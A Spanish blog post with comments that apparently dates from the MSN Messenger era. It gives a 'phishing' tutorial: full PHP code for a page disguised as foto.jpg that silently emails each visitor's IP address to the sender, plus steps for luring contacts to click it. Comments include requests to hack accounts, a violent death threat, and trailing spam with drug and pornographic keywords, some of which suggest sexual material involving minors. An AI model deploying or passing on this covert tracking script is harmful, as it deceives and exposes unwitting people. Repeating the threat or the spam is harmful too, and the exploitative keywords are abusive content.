Phishing: Obteniendo la Ip de nuestros amigos del msn.
Seguramente alguna vez se has necesitado/querido tener acceso a las ip de algunos de tus contactos de Messenger. Hasta ahora, la única manera que, por lo menos yo, conocia para obtenerla era mandándoles un archivo y capturar la ip durante la transmisión. Aunque dicho método funciona, no es demasiado práctico.
Hoy navegando por Internet me he cruzado con Profit42.com. Profit42.com es una especie de blog/comunidad donde entre otros temas hablan de cosas de seguridad y tienen colgados unos cuantos tutoriales. Uno de ellos es sobre el que voy a hablar ahora (Fuente original).
El objetivo consiste en que la victima pulse sobre un link, aparentemente inofensivo, que automáticamente nos mandara un email su ip. Realmente, dicho link no es mas que una pequeña pagina en php, que automáticamente envía un mail con la ip de todo aquel que acceda a el. El unico requesito es tener acceso a un dominio con soporte para php.
Ejemplo:
Creemos una carpeta llamada foto.jpg
En dicha carpeta guardaremos una imagen (http://LoQueSea.com/foto.jpg/foto.jpg) y crearemos un documento “index.php” (http://LoQueSea.com/foto.jpg/index.php) con el siguiente codigo:
<?PHP
$remote_addr = getenv(’REMOTE_ADDR’);
$toaddress = “tuMail@mail.com”; // tu email!
$subject = “Asunto”; // asunto del email
$message = ” IP: $remote_addr”; // Cuerpo del mail
$fromname = “CapturaIp”; // Quien lo envía
$fromaddress = “loQueTeDeLaGana@LoQueSea.com”; // Email de quien lo envía
$headers = “MIME-Version: 1.0\n”;
$headers .= “Content-type: text/plain; charset=iso-8859-1\n”;
$headers .= “X-Priority: 3\n”;
$headers .= “X-MSMail-Priority: Normal\n”;
$headers .= “X-Mailer: php\n”;
$headers .= “From: \”".$fromname.”\” <”.$fromaddress.”>\n”;
mail($toaddress, $subject, $message, $headers);
?>
<img xsrc=”foto.jpg”>
Cuando alguien acceda a Index.php:
- Mandara la ip a tuMail@mail.com
- Mostrara foto.jpg
Aqui un ejemplo del resultado: http://icaix.com/gracioso.jpg
Descargatelo desde Aqui
Como ejecutar el ataque?
Simplemente mándales a tus amigos un link a http://dominoConSoportePhp.com/foto.jpg y listo, recibirás un mail segundos mas tarde con su ip.
De todo este post sobran todas las referencias a “amigo”
Alguien al que le interese mi IP sin que yo lo sepa y me ponga una trampa para conseguirla, no es un amigo, es un HIJO DE PUTA.
no se tu…, pero yo varia veces son ya las que me he tenido que conectar a los ordenadores de mis amigos via ssh para lo que fuera (véase instalación y configuración de aplicaciones) y este truco la verdad es que ahorra bastante tiempo.
Además…, lo que me llamo la atención es la originalidad del método…
Pues en menéame te están poniendo de capullo para arriba juasssss
Por cierto, aprende a escribir, juanker.
hola disculpen quisiera saber como hackearle la cuenta a un amigo quiero obetener sus mails y toda la informacion que reciba ayudenme sip gracias
Jiemma, gracias por leer el post, pero lo que pides es claramente ilegal. Es este blog no encontraras ese tipo de ayuda.
Un suludo
Miggs
Mira yo lo ago y no me sale como hay que hacerlo bien es que mira yo me meto en eso que dice abrir y lo guardo luego me lo mando a mi mismo para ver si funciona y no no sirve no me llega el mensaje ese de los IP que quiero ver
Me hace gracia lo simple que es pero jamás se me habría ocurrido… xD
si es tu “amigo”, solo debes decirle que entre en la web whatismyip.com y que te mande los 4 números que aparecen.
Si no es tu amigo, no se que conio hace en tu lista del msn…
xD, muy bueno
no me funciona
Mira, si usas un poco la cabeza no tenes que haces todo ese laburo, yo baje un programa llamado Msn Checker, lo ejecute y si estas en ciber scanea y te tira todas las IP del anillo de conección pero si estas en tu casa te tira la IP con quien estas hablando al toque igual en un ciber invade una PC que elijas y ves con quien habla y dicen y lo mismo funciona en tu PC.
Olaaa
Necesito saber la IP d alguien….pero nuse muy bien kmo acer el link ste…xD
Necestio ayuda, vamos.
M e perdido en lo dl dominio con soporte para PHP k nuse lo k es ni kmo konseguirlo…xD lo demas lo e entendido…mas o menos, asi que necesito ayuda…nuse dame tu email o algo y ablamos
Dwww
graciasss
hola! como ya te dije por correo electrónico tu sitio es EXCELENTE
me tira el siguiente error
Parse error: syntax error, unexpected ‘@’ in /foto.jpg/index.php on line 3
gracias!
Gracias Juan,
Has puesto correctamente las dobles comillas ” ” entorno a la dirección de mail?
digo esto porque por ahí le sirve a alguien.
no me funcionó con este sistema, porque tenía que tener configurado un smtp tal vez?
asi que un amigo me paso una configuración para que en vez de mandar un mail guarde un archivo (además, le agregó para que diga la hora y alguna cosa más de la máquina que entró)
ahi que crear un archivito llamdo log.txt y dejarlo ahi mismo, con permisos de escritura para terceros y al index.php hay que ponerle tambien permisos de ejecuciòn. Bueno, espero que le sirva a alguien.
Gracias por el feedback Juan,
En principio php a través de la función mail se comunica con el servidor de mail, smtp es “solo” un protocolo. Mientras que el servidor de mail (receptor del mail) y el cliente (servicio php en nuestro caso particular) se entiendan no debería de haber ningún problema.
Con esto no estoy diciendo que el mecanismo no pueda fallar, ya que en tu caso algo debe de estar causando el error, si nos das algo mas de informacion relevante a lo mejor lo podemos arreglar.
Por otro lado si me mandas tu index.php lo meto en el tutorial.
jaja
que tonto
me olvidé de postear. Ahora no estoy en casa. Más tarde te lo mando. Tambien voy a hacer la prueba con el archivo que posteaste vos para madarme el error exacto que me tira, ya que tuviste razón respecto al primero error que postie. Gracias.
Espero tu mail pues, esta por el blog pero por si acaso mi mail es mangel12321 at hotmail.com
Un saludo!
yo quisiera aprender a utilizarlo completamente la verdad no se como crear el dominio php me puede alguien ayudar me interesa mucho aprender esta aplicacion
No entiendo por qué hablas del tema ilegal como si para ti fuera indiferente si solo con ver el nombre de tu articulo ya das a entender muchas cosas de las intenciones que están de por medio … –> Phishing
Bueno es una una critica, ya que me parece que esto es un tema delicado que siempre debe estar claro
Saludos y felicitaciones por la página y el esfuerzo de poner tu propio servidor web.
p3dRø
Es tan simple, LOL nose como no se me ocurrio antes…
Pero me quedo con uno de los mensajes de arriba:
si es tu “amigo”, solo debes decirle que entre en la web whatismyip.com y que te mande los 4 números que aparecen.
Si no es tu amigo, no se que conio hace en tu lista del msn…
hola oye una pregunta para que sirve conocer la ip de alguien
disculpa la ignorancia
gracias
dale manga d giles se creen vivos siendo hakers no se dan cuenta q deben ser trribles bobones q se fisuran a un pc! mangas d gilespero cara a cara no enkra ninguno giles les voy a mandar a abrir(abrir=cortarles la panza al medio) todo por creerses vivos giles
fueron cnmigo no se juega chupapijas d mierdas ya van a ver yo q usteds pongo seguridad en sus casas xq dntro d 1 semana les va a pasar lo peor d su vida o kpas q hasta la muert
Hola a todos trate con el sistema que dices auqi pero a mi no me funciona tengo el dominio y el hosting que soporta php sigo los pasos al pie de la letra no me como niguna comilla, reviso y hago varias convinaciones de emails por posible problemas con stmp pero utilizo tanto correos comerciales como empresariales y lo mando lo abren y no ms no llega… cual sera el error….. aparte tambien quiero descargar el archivo y la liga da error ….. Espero que puedan corregir el error y exponer sobre las causas del problema !!!! gracias!
хех. удивил
Hello, can you please post some more information on this topic? I would like to read more.
buy kamagra online
buy levitra online
buy cialis online
buy accutane online
free adult thumbs
black sex clips
free porno clips
dog fucking girls
nn preteen model
cameron diaz sex tape
free pamela tommy video
anna kournikova sex
mature women sex video
hot teen fucking
18 year old pussy
nude brazilian girls
free oral sex videos
preteen lolita nudes
free nude asians
black tits